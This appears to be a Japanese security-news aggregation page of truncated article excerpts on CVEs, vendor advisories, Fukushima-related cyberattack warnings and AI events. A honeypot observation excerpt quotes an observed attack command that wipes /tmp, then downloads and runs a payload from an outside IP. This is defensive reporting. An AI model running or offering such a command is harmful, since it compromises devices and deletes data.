JVNVU#92007249 CODESYS GmbH製CODESYS Development Systemにおける複数の脆弱性 CVE-2023-3662 CODESYS Development System 3.5.17.0から3.5.19.20より前のバージョン CVE-2023-3669 CODESYS Development System 3.5.19.20より前のバージョン CVE-2023-3663 CODESYS Development System 3.5.11.0から3.5.19.20より前のバージョン CODESYS GmbHが提供するCODESYS Development Systemには、次の複数の脆弱性が存在します。 ファイル検索パスの制御不備 (CWE-427) - CVE-2023-3662 過度な認証試行の不適切な制限 (CWE-307) - CVE-20
ドイツ企業の商号には、一定の規則に基づいて略称が末尾にあります。 略称の中でも、特に見かける事が多い「GmbH」と「AG」について簡単に説明したいと思います。 特にドイツ企業の8割程度が「GmbH」の形態をとっていると言われており、何かしらドイツ語圏と関わりのあった方は、一度目にしたこともある事かと存じます。 欧州会社規則や、イギリス・フランス等の場合についても多少触れています。 「GmbH」とは、有限責任会社 ドイツにおける「GmbH」とは、日本の「旧有限会社」に相当する企業形態です。 「GmbH」の正式名称は、Gesellschaft mit beschränkter Haftung Gesellschaft = Companymit = withbeschränkter = LimitedHaftung = Liability 英語にするとCompany with Limited L
Apple、セキュリティ研究者用iPhone提供プログラムの申込受付開始。日本も対象 2023 8/31 Appleは現地時間8月30日、セキュリティ研究者に特別仕様のiPhoneを提供する2024年の「Apple Security Research Device Program(SRDP)」への参加申し込みの受付を開始しました。これにより、セキュリティ研究者はiOSの重大な脆弱性の発見を容易にする、Appleのセキュリティ研究用デバイス「Security Research Device(SRD)」を入手できるようになります。 ■3行で分かる、この記事のポイント 1.Apple Security Research Device Programの参加申し込みの受付開始。 2.バグ懸賞プログラム「Apple Security Bounty」と連携している。 3.セキュリティ研究用に設計されたi
CVE番号というものがあります。 CVEはCommon Vulnerabilities and Exposuresで、情報セキュリティの分野において、システムソフトウェアやWebアプリケーションなどの脆弱性やシステム上の攻撃可能な不備などに対し、一意の番号を付与したデータベースです。 セキュリティ研究者、ソフトウェア開発者やその会社、ソフトウェア利用者などいろいろな立場の人がこれを使用し、共通の会話ができる環境を提供しています。 このCVEに関連して、不可思議な事象がありました。 2023年8月にCVE-2020-19909が公表された CVE-2020-19909の文字列の中には「2020」が含まれます。 これは、このCVE番号が2020年に確保されたことを示します。 これは一見普通のことです。 CVE番号は問題かもしれない事象の発見者にあらかじめ確保され、関係者への連絡や問題の調査や対
脅威の概要 日々進化するサイバー脅威の中で、マルウェアの作者は、疑うことを知らないユーザーを悪用するための新たな手段を絶えず模索しています。Windowsオペレーティング・システムには、ユーザーがコンピュータ上のファイル、フォルダ、その他のアイテムを素早く見つけることができる強力な検索機能が用意されています。この検索機能のあまり知られていない側面の1つに、ローカル検索を実行するための拡張検索機能を提供する「search-ms」URIプロトコルハンドラがあります。また、リモートホストにあるファイル共有に対してクエリーを実行する機能も提供しており、Trellix Researchのブログで説明されているように、これを悪用することも可能です。 Trellix Advanced Research Center は、”search-ms” URI プロトコルハンドラを利用した新しい攻撃手法を発見しま
大規模言語モデル(LLM)を活用したアプリケーションを開発するためのフレームワーク「LangChain」に深刻な脆弱性が明らかとなった。今後修正される見込みだという。 「同0.0.171」において「JSONファイル」の取り扱いに不備があり、リモートより任意のコードを実行されるおそれがある「CVE-2023-36281」が判明したもの。5月にはソースリポジトリにおいて実証コードが示されていた。 米国立標準技術研究所(NIST)の脆弱性データベース「NVD」では、共通脆弱性評価システム「CVSSv3.1」のベーススコアを「9.8」、重要度を「クリティカル(Critical)」とレーティングした。 開発関係者は、同ソフトウェアはベータ段階にあり、指摘について優先順位付けのもと対応していると説明。対応が遅れたことについて謝罪し、指摘された問題についてはエスカレーションを行っており、今後修正を行う予
日本医師会総合政策研究機構(日医総研)が8月24日に公開した「サイバー事故に関し システムベンダーが負う責任:医療DXを推進するために[PDF]」という文書が、SNS上で物議を醸しているようだ。その文章の内容は、医療機関とITベンダーの契約において、サイバー被害の責任をどのように分担するかについての内容。文書は、ベンダーからのリスク説明が不十分だった場合でも、「信義誠実の原則」に基づいて、既知の脆弱性についてベンダーが適切な情報提供を怠った場合、契約に明記されていなくても一定の責任を問うことができるように求めている(日医総研発表文書、上原 哲太郎氏のXポスト、ITmedia、The Key Questions)。 日医総研によると、保守契約の中に情報提供義務が明記されていないケースが多いという。こうした情報提供義務が明記されていない場合、ベンダー側に責任を問えるケースは「極めて少ない」。日
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます ラックは8月31日、東京電力 福島第一原子力発電所での処理水放出に便乗して、セイコーソリューションズのLTE対応IoTルーター製品「SkyBridgeシリーズ」に存在する脆弱(ぜいじゃく)性を狙ったサイバー攻撃が発生する恐れがあると注意を呼びかけた。 ラックは、処理水放出に便乗するサイバー攻撃の状況を監視しているといい、放出への抗議として、特定のSNSアカウントが日本の複数の組織に対して攻撃を宣言しているなど、攻撃や被害の危険性が高まっていると指摘する。このSNSアカウントが8月28日、SkyBridgeシリーズへ遠隔から侵入可能な脆弱性を発見し、その悪用の手法や影響を受ける恐れのある機器を検索する方法などを公表したという。 セイコーソ
VMware製品のゲストOSにインストールするユーティリティ「VMware Tools」に署名検証を回避できる脆弱性が明らかとなった。アップデートが提供されている。 同ソフトウェアにおいて「SAMLトークン」の署名検証をバイパスすることが可能となる脆弱性「CVE-2023-20900」が明らかとなったもの。 同脆弱性は、仮想マシンのネットワークにおいて、中間者攻撃が可能となる場合に悪用でき、「SAMLトークン」の署名検証する処理を回避してゲストによる操作を行うことができるという。 同社は共通脆弱性評価システム「CVSSv3.1」においてベーススコアを「7.5」とし、4段階ある重要度については、上から2番目の「重要(Important)」とレーティングした。 同社はWindows向けに「VMware Tools 12.3.0」をリリース。Linuxの旧バージョンに「同10.3.26」を提供す
ハニーポット(仮) 観測記録 2023/08/22分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP webprosbotによるスキャン行為 .jsへのスキャン行為 UserAgentがHello, Worldであるアクセス を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス /.gitへのスキャン行為 を確認しました。 Location:UK D-link製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス を確認し
日本政府は8月22日、東京電力福島第一原発の処理水放出作業を24日にも開始すると決定しました。これを受けて東京電力は24日から、処理水を太平洋に放出する作業を開始したと発表しています。 福島第一原発の処理水、海洋放出始まる - BBCニュース 東京電力では「処理水ポータルサイト」などを通じて処理水の海洋放出の状況や海域モニタリングの結果について公表し、関係者の理解を求めています。しかしながら諸外国からの反発や福島県内を中心として市役所や市内の学校、公共施設への迷惑電話などの嫌がらせも発生し、業務の妨げになる事態にも発展しています。 処理水ポータルサイト | 東京電力 処理水の海洋放出実施がサイバー攻撃にも発展 こうした「嫌がらせ」行為はすでにサイバー攻撃としても展開されています。8月10日には国際的ハッカー集団が処理水の海洋放出計画に抗議するためとして、日本の原子力関連団体のウェブサイト
鹿児島県日置市において、同市職員3人が別の複数職員になりすまして同市システムへ不正アクセスしていたことがわかった。 同市で利用する庁内グループウェアのログを確認していたところ、職員1人が不正アクセスしていることが4月20日に発覚。さらに調査を進めたところ、別の職員2人も同様に他職員になりすましてアクセスしていることが判明した。 これら職員において共謀関係はなく、それぞれの職員が単独で行為に至っていた。教育委員会主査は、1月1日から4月21日にかけて、61人に対しのべ697回にわたりログイン。メールを閲覧したり、人事評価記録書などのデータをダウンロードしていた。 また産業建設部主事補は37人に対し、のべ232回のログインを行い、メールを閲覧していたほか、教育委員会課長補佐は、14人に対しのべ38回にわたってログインし、メールや給与明細などを見ていた。 同市では、1月1日にあたらしいシステムを
ハニーポット(仮) 観測記録 2023/08/26分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP .jsへのスキャン行為 WordPressへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 81.161.229.185/jaws; sh /tmp/jaws cd /tmp; rm -rf
iPhoneやiPadを新規購入、もしくは機種変更をした場合には、Apple IDを作成しましょう。Apple IDはAppleのサービスにアクセスする際に必要になるほか、連絡先、お支払い情報の登録もできます。本記事では、iPhoneでApple IDを新規作成する方法を解説します。 複数端末で同一のApple IDを利用できる iPhoneやiPadでアプリをダウンロードしたり、iCloudを利用したりする場合、Apple IDの作成が必要です。Apple IDとは、App Store、iTunes Store、iCloudなど、Appleに関するサービスで利用するIDです。連絡先や決済情報などが紐付いてるほか、ソフトウェアアップデートなどでも必要となります。 本記事では、iPhoneで新規のメールアドレスを作成し、Apple IDを作成・適用する方法について解説します。 Apple I
『がんばれ森川くん2号』など手がけた“ゲーム×AIの先駆者”森川幸人に訊く 「生成AIとゲーム」の理想的な関係って? 今日の世界において、もはや生成AIの話題を耳にしない日はない。 2022年にテキストから画像を生成するAI『Mid Journey』のオープンベータ版が公開されたのち、同年11月には『ChatGPT』が無料公開された。テキストを入力するだけでこれまでに無いくらい自然な応答文が返ってくるという革新性に多くの人が刺激を受け、一気に「AI」を巡る開発競争に火が着いた。 その活用はチャットボットから深層学習を活用した機械制御まで、ありとあらゆるジャンルに広がりつつある。そして、「生成AI×ゲーム」という組み合わせも、いま注目されている分野のひとつだ。今後、同分野はどのような進化を遂げるのだろうか? 各ジャンルのAIに詳しい方々に話を聞く特集『生成AIとカルチャー』。今回は『がんばれ
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます Acompanyは8月30日、プライバシーとセキュリティを重視した安全なデータコラボレーションを可能にするデータクリーンルームソリューション「AutoPrivacy」を本格展開すると発表した。 データクリーンルームは、個人のプライバシーを保護しつつ、複数事業者のデータを掛け合わせて活用する環境。AutoPrivacyが提供するデータクリーンルームは、同社が持つ秘密計算や連合学習などの技術によるプライバシー保護と、複数事業者間のデータ連携を実現する環境になる。 昨今、データを活用した新規事業の創造やデータトリブン経営に注目が集まっている。一方で、欧州連合(EU)の「一般データ保護規則」(GDPR)や日本の「個人情報保護法」といった規制が強
AI・人工知能のAIsmiley TOP ニュース 日本における生成AIの可能性とChatGPT時代のキャリアアップとは【JDLA主催 CDLE AII Hands 2023 レポート】 日本ディープラーニング協会(JDLA)は、2023年8月26日(土)に「CDLE AII Hands 2023」を東京ポートシティ竹芝ポートホールで開催しました。会場にはG検定・E資格者270名が集結。社内外でのキャリアをテーマに、理事長 松尾 豊 東京大学大学院教授やジャパン・リスキリング・イニシアチブ代表理事 後藤 宗明氏らによる講演が行われました。当日の様子を写真を中心にレポートします。 第3次AIブームから第4次AIブームへ。日本の生成AIの可能性と人材育成 まずはJDLA理事長を務める松尾 豊氏による特別講義が行われました。大きく分けて「生成AIの現状と活用可能性」と「国内外の動きと日本のAI戦
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く